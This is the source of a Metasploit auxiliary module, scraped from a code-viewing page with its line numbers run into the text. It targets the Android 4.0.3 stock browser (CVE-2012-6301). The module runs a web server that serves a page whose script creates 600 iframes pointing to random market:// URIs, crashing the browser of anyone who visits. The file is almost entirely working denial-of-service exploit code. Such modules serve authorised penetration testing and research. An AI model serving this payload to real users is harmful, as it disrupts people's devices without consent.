Path: blob/master/modules/auxiliary/dos/android/android_stock_browser_iframe.rb
21537 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::HttpServer78def initialize(info = {})9super(10update_info(11info,12'Name' => 'Android Stock Browser Iframe DOS',13'Description' => %q{14This module exploits a vulnerability in the native browser that comes with Android 4.0.3.15If successful, the browser will crash after viewing the webpage.16},17'License' => MSF_LICENSE,18'Author' => [19'Jean Pascal Pereira', # Original exploit discovery20'Jonathan Waggoner' # Metasploit module21],22'References' => [23[ 'PACKETSTORM', '118539'],24[ 'CVE', '2012-6301' ]25],26'DisclosureDate' => '2012-12-01',27'Actions' => [[ 'WebServer', { 'Description' => 'Serve exploit via web server' } ]],28'PassiveActions' => [ 'WebServer' ],29'DefaultAction' => 'WebServer',30'Notes' => {31'Stability' => [CRASH_SERVICE_DOWN],32'SideEffects' => [],33'Reliability' => []34}35)36)37end3839def run40exploit # start http server41end4243def setup44@html = %|45<html>46<body>47<script type="text/javascript">48for (var i = 0; i < 600; i++)49{50var m_frame = document.createElement("iframe");51m_frame.setAttribute("src", "market://#{Rex::Text.rand_text_alpha(1..16)}");52document.body.appendChild(m_frame);53}54</script>55</body>56</html>57|58end5960def on_request_uri(cli, _request)61print_status('Sending response')62send_response(cli, @html)63end64end656667